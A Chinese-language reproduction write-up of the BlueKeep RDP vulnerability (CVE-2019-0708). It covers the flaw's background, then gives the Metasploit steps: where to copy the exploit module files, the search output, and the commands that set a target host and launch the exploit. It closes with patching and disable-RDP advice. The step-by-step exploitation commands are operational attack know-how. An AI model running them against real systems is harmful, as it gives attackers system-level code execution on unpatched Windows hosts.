0X01 漏洞描述:
在2019年5月,微軟發布了針對遠程代碼執行漏洞CVE-2019-0708的補丁更新,該漏洞也稱為“BlueKeep”,漏洞存在於遠程桌面服務(RDS)的代碼中。此漏洞是預身份驗證,無需用戶交互,因此具有潛在武器化蠕蟲性性漏洞利用的危險。如果成功利用此漏洞,則可以使用“系統”權限執行任意代碼。Microsoft安全響應中心的建議表明這個漏洞也可能會成為一種蠕蟲攻擊行為,類似於Wannacry和EsteemAudit等攻擊行為。由於此漏洞的嚴重性及其對用戶的潛在影響,微軟采取了罕見的預警步驟,為不再受支持的Windows XP操作系統發布補丁,以保護Windows用戶。
0X02 漏洞復現:
在19年的9月7號凌晨,這個漏洞的exp被公布到github上了。然后安全圈里的師傅們都震驚了,吆喝着起床日站。
下面是土司社區大佬算命瞎子的朋友圈:
exp剛出來的時候,下載導入metasploit:
1 rdp.rb -> /usr/share/metasploit-framework/lib/msf/core/exploit 2 3 rdp_scanner.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp 4 5 cve_2019_0708_bluekeep.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp 6 7 cve_2019_0708_bluekeep_rce.rb -> /usr/share/metasploit-framework/modules/exploits/windows/rdp 8 需要注意如果沒有目錄就重新創建一下。
進入msf控制台以后使用reload_all命令,重新加載所有模塊。然后搜索0708:
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > search 0708 ======= # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check 1 exploit/windows/browser/clear_quest_cqole 2012-05-19 normal No IBM Rational ClearQuest CQOle Remote Code Execution 2 exploit/windows/browser/tumbleweed_filetransfer 2008-04-07 great No Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow 3 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free 4 auxiliary/windows/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check 設置參數: use exploit/windows/rdp/cve_2019_0708_bluekeep_rce set rhosts 192.168.1.106 set target 1 exploit
這種情況是把目標主機打藍屏了。這個時候只需要添加一個參數即可獲取shell:
上面只是其中一種復現方式,另一種復現方式是在2019.4版本的kali上進行的,不需要導入exp直接可以搜索到。也不需要set forceexploit true,即可成功。
0X03 修復建議:
微軟官方公告:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
在沒有打補丁的時候建議關閉rdp服務。
0X04 參考文章:
http://zone.secevery.com/article/1109